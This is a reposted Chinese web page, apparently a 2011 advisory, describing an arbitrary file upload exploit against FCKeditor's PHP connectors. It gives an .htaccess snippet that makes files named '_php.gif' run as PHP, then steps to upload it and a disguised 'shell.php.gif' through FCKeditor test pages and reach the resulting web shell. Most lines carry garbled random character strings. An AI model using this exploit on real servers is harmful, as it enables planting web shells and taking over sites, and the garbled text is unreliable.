FCKeditor所有php版本Upload上传漏洞
, `. H* |- s+ e& m+ K作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:078 {! Q0 b5 J! @6 S. @ H5 R1 D& f
减小字体 增大字体
C$ m: q- I+ D& R: u0 X) B9 K[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability, T/ Z( Y6 O. ]8 H
[+] Date: 20113 o/ Y6 O! W3 S) }" E8 R# h/ c
[+] Author : sinesafe.cn
" @. k1 m9 U2 n" w5 d[+] Website : WwW.sinesafe.cn. p4 A0 k, _ Y" h% x- z9 w( W
———————————————————
7 d* S$ X* e0 n1.create a htaccess file:
3 A6 s9 y8 \2 l3 [5 a4 K5 k) W- Mcode:
" n( I) r5 J3 E; F7 ~" p0 p6 H<FilesMatch “_php.gif”>) D1 J) u0 ?+ e- Q
SetHandler application/x-httpd-php5 w7 o, I9 S y, w5 w- {
</FilesMatch>
1 ]" z, t7 {3 {; A" G
7 c! e. L) Y3 X* w2.Now upload this htaccess with FCKeditor.. }' @) H0 b. M$ I3 E
/ [! K* w2 ~ K& C, b: \
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html' K2 r: R+ }3 B5 T5 d
& K$ }1 ` p! P6 dhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
& O: u0 p0 e! d# {
% r5 q' K! J$ z———————————————————————————————-
6 m4 B& A3 F9 y3.Now upload shell.php.gif with FCKeditor.
2 E! E- M; a7 X: V+ Q4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
6 [- @! z$ X1 ?5.http://www.sinesafe.cn/anything/shell_php.gif
9 [! o: g: f" g; R: S$ M. b# `, D6.Now shell is available from server. |
. J A5 h: p+ ^" c
& L" L# S+ @# p, F( U3 v2 ?2 `. }/ B# D" Z. A& R
|
发表于 2013-10-27 17:25:21
收藏
支持
反对